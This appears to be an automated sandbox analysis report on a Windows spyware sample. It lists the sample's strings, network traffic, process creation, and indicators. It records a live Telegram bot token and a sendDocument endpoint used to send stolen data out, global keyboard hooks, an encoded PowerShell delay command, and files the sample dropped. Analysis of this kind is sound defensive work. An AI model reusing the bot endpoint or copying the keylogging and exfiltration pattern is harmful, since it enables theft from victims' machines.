                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                Source: Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.607404091.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.639278801.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003322000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000F.00000002.578941562.0000000003021000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002BD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: PSFBGrvmxy.exe, 00000000.00000003.380165357.0000000004031000.00000004.00000800.00020000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: unknownHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749bHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.4:49696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\PSFBGrvmxy.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.390178593.0000000000F80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: PSFBGrvmxy.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_02C4A9B83_2_02C4A9B8
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_02C4C9783_2_02C4C978
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_02C49DA03_2_02C49DA0
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_02C4A0E83_2_02C4A0E8
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_058AF4E83_2_058AF4E8
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_058A9D983_2_058A9D98
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_058A19D23_2_058A19D2
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_058A19E03_2_058A19E0
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_069FB8283_2_069FB828
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_069F82703_2_069F8270
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_069F276B3_2_069F276B
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_069FE8103_2_069FE810
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_069F30283_2_069F3028
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeCode function: 3_2_069F49403_2_069F4940
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.394288433.0000000003EA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000003.379623311.0000000005671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000003.380165357.0000000004031000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVusieaxlmiuiheoczvhzqqg.dll" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.394288433.0000000003F39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameVusieaxlmiuiheoczvhzqqg.dll" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002EF2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef7b8a578-bf20-4913-ad1a-1959db4fc78b.exe4 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.390178593.0000000000F80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000000.312114779.0000000000900000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000003.395360751.000000000675A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.613133509.0000000000BC9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exeBinary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe 66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe 66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
                Source: PSFBGrvmxy.exeReversingLabs: Detection: 66%
                Source: PSFBGrvmxy.exeVirustotal: Detection: 57%
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile read: C:\Users\user\Desktop\PSFBGrvmxy.exeJump to behavior
                Source: PSFBGrvmxy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exe
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeProcess created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile created: C:\Users\user\AppData\Roaming\XnckpwzJump to behavior
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile created: C:\Users\user\AppData\Local\Temp\CdFileMgrJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/17@11/3
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
